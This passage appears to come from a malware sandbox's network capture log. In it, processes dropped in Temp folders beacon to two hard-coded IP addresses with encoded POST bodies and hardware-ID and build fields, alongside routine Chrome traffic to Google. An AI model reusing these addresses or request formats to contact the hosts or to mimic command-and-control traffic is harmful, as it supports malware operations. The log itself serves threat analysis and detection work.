Nov 7, 2024 04:13:51.249916077 CET	1236	IN	Data Raw: da 20 20 21 1f 3b 3c e9 ac e0 5a 79 f3 b6 38 c8 00 84 5b ff a7 a6 fd a6 56 49 d8 cc 6a 54 6e 90 b3 06 16 9c 2c d5 bb d5 7a 3b 41 b8 cd 71 bf 9e 33 95 32 3f ef 2e 37 ff 6d 4d d6 01 b0 34 6e f7 ce f3 f9 69 a9 dd 79 46 92 c0 9d 7f e6 f0 f0 4d cf b5 Data Ascii: !;<Zy8[VIjTn,z;Aq32?.7mM4niyFM9mZ0x)BTeUk;{c<S^Z_>,via- esic&R)N$G?E<"-zgt6bg%
Nov 7, 2024 04:13:51.249927998 CET	1236	IN	Data Raw: 35 43 88 fe a0 1d 0f 95 10 9c 67 8d 87 45 e8 87 8a c1 78 3d d1 31 a1 95 17 f9 f4 a5 c0 83 80 67 78 71 a3 09 18 66 ae 22 93 38 51 30 29 39 92 9c f3 a8 9d 6d 17 f3 74 ed d4 4c 9a ac a3 6d ab ae d0 ff b8 9d be 6d 63 1e df de a7 21 52 eb 6e 29 b6 b0 Data Ascii: 5CgEx=1gxqf"8Q0)9mtLmmc!Rn);Y8zno6Unm3=NWtLTB0>%9!@WP!`Y9/TFckOS?0,(y>=pfp86djB;XfSPC;7
Nov 7, 2024 04:13:51.249944925 CET	1060	IN	Data Raw: ed 4f 40 cf e8 61 67 1a 33 92 79 a8 d0 f5 66 6f ec 4e 84 1d 01 be 55 e0 18 44 70 81 30 0e fb 40 21 51 88 4e a0 b1 57 67 32 f7 4b bf 15 bd db 95 24 4f 4f b6 60 ef 4d 95 76 cc 50 96 88 ca 3c 28 29 18 e7 85 98 ef 66 fd a8 aa 63 21 d5 f9 74 c9 12 35 Data Ascii: O@ag3yfoNUDp0@!QNWg2K$OO`MvP<()fc!t5=L_A@]oo=Cfa<}g}<%Dh6(75/0Q\oezEE<]DI#ti>8U\5jP,@NiD?GonNi5;q
Nov 7, 2024 04:13:51.249958038 CET	1236	IN	Data Raw: a0 f1 83 cf a4 64 74 95 28 b1 9d 49 d6 2e f0 1c 27 37 c4 34 a0 3d 14 29 8f 3e 7f 49 12 0e ca c4 98 44 9e 01 d6 7c d7 30 0e c1 58 44 f8 44 1f bd a6 e5 46 51 ef 5f 17 bd a6 41 dc 95 21 1f a0 01 1c fc 3f 96 66 3c da 90 fc c0 66 8a f8 ef 66 55 a5 a9 Data Ascii: dt(I.'74=)>ID\|0XDDFQ_A!?f<ffUzg}k?Y(='~@fOE*Vq78/]u=O]D)#DB;wI'8fnl$EXD;Y>{DiS?_7nGSND8^<QL#f
Nov 7, 2024 04:13:51.249969006 CET	1236	IN	Data Raw: 4a ef 40 6d 9f 59 d2 c9 58 1b fa ba f6 6a a0 96 a5 bb ad 8d ed 4c 08 a5 bc ed e0 f6 15 6b b2 81 c5 0f 70 6d db 55 58 96 97 90 ab 15 91 ed be 95 f0 35 18 23 e0 a9 e2 26 e9 44 70 8d 30 da fb 98 85 77 89 4e a0 ad 57 1b 33 fa 2f e1 81 bd be 95 24 35 Data Ascii: J@mYXjLkpmUX5#&Dp0wNW3/$5#Efq+unn@nuO4<"im%6r:)=:1'g\@D)}8e(`f NoLvmyr+=oNZ%\|
Nov 7, 2024 04:13:51.254968882 CET	1236	IN	Data Raw: 9f 6f 0a c9 cc 31 f5 58 1b d1 b8 47 6b a5 8d dc a7 9d db 2f e0 03 a9 87 c4 2f 80 e9 e8 95 65 e5 0b 3e d9 70 3a f0 43 1a b3 79 d8 7f 70 3b 28 e9 8c 53 b8 6d b0 36 06 5d 61 6d 23 31 7e 1e a9 d9 a9 b4 c3 a2 b6 28 c7 47 71 42 1b 35 a5 af 0f a1 88 b8 Data Ascii: o1XGk//e>p:Cyp;(Sm6]am#1~(GqB59TXhyIt}-(s+T8}<yV]y!]^-<CL]8q8Mxe8(x^j=B/]Ii^<&x])A)/DF?~8sJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50091	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:52.445318937 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 04:13:53.369131088 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50093	185.215.113.206	80	1780	C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:52.756129980 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:13:53.686271906 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:13:53.689623117 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build"tale------IJJKKJJDAAAAAKFHJJDG--
Nov 7, 2024 04:13:53.974864006 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50095	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:54.900445938 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 04:13:55.838311911 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50098	185.215.113.206	80	5744	C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:57.443928003 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:13:58.346036911 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:13:58.348280907 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="build"tale------FCAEBFIJKEBGHIDHIEGI--
Nov 7, 2024 04:13:58.627798080 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50099	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:13:57.475826025 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 7, 2024 04:13:58.379842043 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:13:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50101	185.215.113.43	80	7336	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:14:00.461961031 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 7, 2024 04:14:01.374660969 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Nov 2024 03:14:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	172.217.16.196	443	7268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:06 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 03:12:07 UTC	1367	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:06 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ZAUH6RnzEKDsdrYezMj6Wg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Save-Data Accept-CH: Downlink Accept-CH: ECT Accept-CH: RTT Accept-CH: Device-Memory Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 03:12:07 UTC	11	IN	Data Raw: 65 34 37 0d 0a 29 5d 7d 27 0a 5b Data Ascii: e47)]}'[
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 22 22 2c 5b 22 73 68 69 62 61 20 69 6e 75 20 63 72 79 70 74 6f 20 70 72 69 63 65 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 6e 65 74 66 6c 69 78 20 74 68 65 20 64 69 70 6c 6f 6d 61 74 20 73 65 61 73 6f 6e 20 32 22 2c 22 64 65 61 6c 73 20 62 6c 61 63 6b 20 66 72 69 64 61 79 22 2c 22 73 61 75 62 65 72 20 66 31 20 64 72 69 76 65 72 73 20 32 30 32 35 22 2c 22 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 77 69 6e 6e 69 6e 67 20 6e 75 6d 62 65 72 73 22 2c 22 66 6f 72 74 6e 69 74 65 20 6f 67 20 66 6f 72 74 6e 69 74 65 22 2c 22 61 73 74 6f 6e 20 76 69 6c 6c 61 20 74 79 72 6f 6e 65 20 6d 69 6e 67 73 22 2c 22 73 74 72 61 6e 67 65 72 20 74 68 69 6e 67 73 20 73 65 61 73 6f 6e 20 35 20 6e 65 74 66 6c 69 78 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c Data Ascii: "",["shiba inu crypto price prediction","netflix the diplomat season 2","deals black friday","sauber f1 drivers 2025","mega millions winning numbers","fortnite og fortnite","aston villa tyrone mings","stranger things season 5 netflix"],["","","","","","",
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 67 33 55 57 70 68 63 6e 6c 47 51 58 41 31 62 6d 45 31 4b 7a 52 33 56 45 5a 4e 63 6c 68 57 4d 6d 6c 6e 52 57 46 55 59 58 64 49 55 7a 52 34 62 44 4a 4c 4b 7a 68 51 61 46 42 34 52 48 55 34 63 31 52 75 62 7a 55 78 63 48 46 6c 56 57 70 68 5a 6d 56 4a 5a 7a 64 72 63 6e 4e 53 4e 6a 52 75 54 6c 52 54 55 54 59 30 59 57 68 58 56 31 4a 58 53 7a 4a 51 55 54 4d 76 54 79 38 77 65 45 35 35 53 30 31 77 57 54 5a 70 65 58 56 43 63 55 68 50 4d 30 78 36 65 47 78 43 57 56 6c 6f 52 58 64 49 64 55 39 45 63 55 64 33 55 46 46 71 64 58 68 5a 64 48 56 5a 54 6e 68 70 65 57 31 56 57 56 4a 33 4c 32 46 51 56 57 31 50 61 32 64 76 57 54 51 7a 53 6b 70 46 4d 47 70 43 56 46 70 57 51 6a 42 70 4e 54 68 54 5a 6e 42 6f 54 48 6b 79 62 6b 35 57 56 58 68 34 63 55 4e 52 56 7a 46 4f 64 48 70 48 54 Data Ascii: g3UWphcnlGQXA1bmE1KzR3VEZNclhWMmlnRWFUYXdIUzR4bDJLKzhQaFB4RHU4c1RubzUxcHFlVWphZmVJZzdrcnNSNjRuTlRTUTY0YWhXV1JXSzJQUTMvTy8weE55S01wWTZpeXVCcUhPM0x6eGxCWVloRXdIdU9EcUd3UFFqdXhZdHVZTnhpeW1VWVJ3L2FQVW1Pa2dvWTQzSkpFMGpCVFpWQjBpNThTZnBoTHkybk5WVXh4cUNRVzFOdHpHT
2024-11-07 03:12:07 UTC	895	IN	Data Raw: 51 57 39 45 55 6b 31 35 53 45 31 5a 63 44 4a 4e 54 58 6b 32 57 45 45 76 52 57 70 6a 59 32 70 6d 52 47 5a 55 4e 55 78 53 62 48 68 51 55 7a 41 35 4e 32 64 46 65 45 30 31 53 79 39 4d 5a 6b 46 71 61 6b 52 6f 52 31 64 51 54 55 70 31 65 6b 78 52 4d 55 5a 35 4d 56 42 50 64 58 64 73 55 79 74 33 55 44 49 34 52 47 64 55 62 47 5a 47 4d 57 4a 73 51 6a 6c 70 65 6b 74 4e 63 45 6c 49 64 58 70 30 64 6d 4e 6b 59 6c 6c 45 53 30 64 36 57 47 59 78 54 47 56 56 53 30 46 55 4b 33 68 35 56 45 78 78 56 32 4a 56 62 33 6b 31 4e 47 6c 44 56 6a 46 44 5a 44 6c 32 54 47 5a 69 51 56 52 70 54 32 35 76 59 32 78 77 61 6b 70 46 57 45 31 36 51 57 67 31 57 6c 68 4d 54 57 5a 75 4d 44 4a 34 52 43 74 4a 4d 55 35 44 63 45 4e 53 61 48 52 79 61 46 46 6d 57 45 64 77 61 32 52 4f 57 47 4e 69 59 31 46 Data Ascii: QW9EUk15SE1ZcDJNTXk2WEEvRWpjY2pmRGZUNUxSbHhQUzA5N2dFeE01Sy9MZkFqakRoR1dQTUp1ekxRMUZ5MVBPdXdsUyt3UDI4RGdUbGZGMWJsQjlpektNcElIdXp0dmNkYllES0d6WGYxTGVVS0FUK3h5VExxV2JVb3k1NGlDVjFDZDl2TGZiQVRpT25vY2xwakpFWE16QWg1WlhMTWZuMDJ4RCtJMU5DcENSaHRyaFFmWEdwa2ROWGNiY1F
2024-11-07 03:12:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	172.217.16.196	443	7268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:06 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 03:12:07 UTC	1042	IN	HTTP/1.1 200 OK Version: 691307345 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 07 Nov 2024 03:12:06 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 03:12:07 UTC	336	IN	Data Raw: 32 35 32 35 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2525)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 20 67 62 5f 6f 64 20 67 62 5f 46 64 20 67 62 5f 6c 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 Data Ascii: gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg 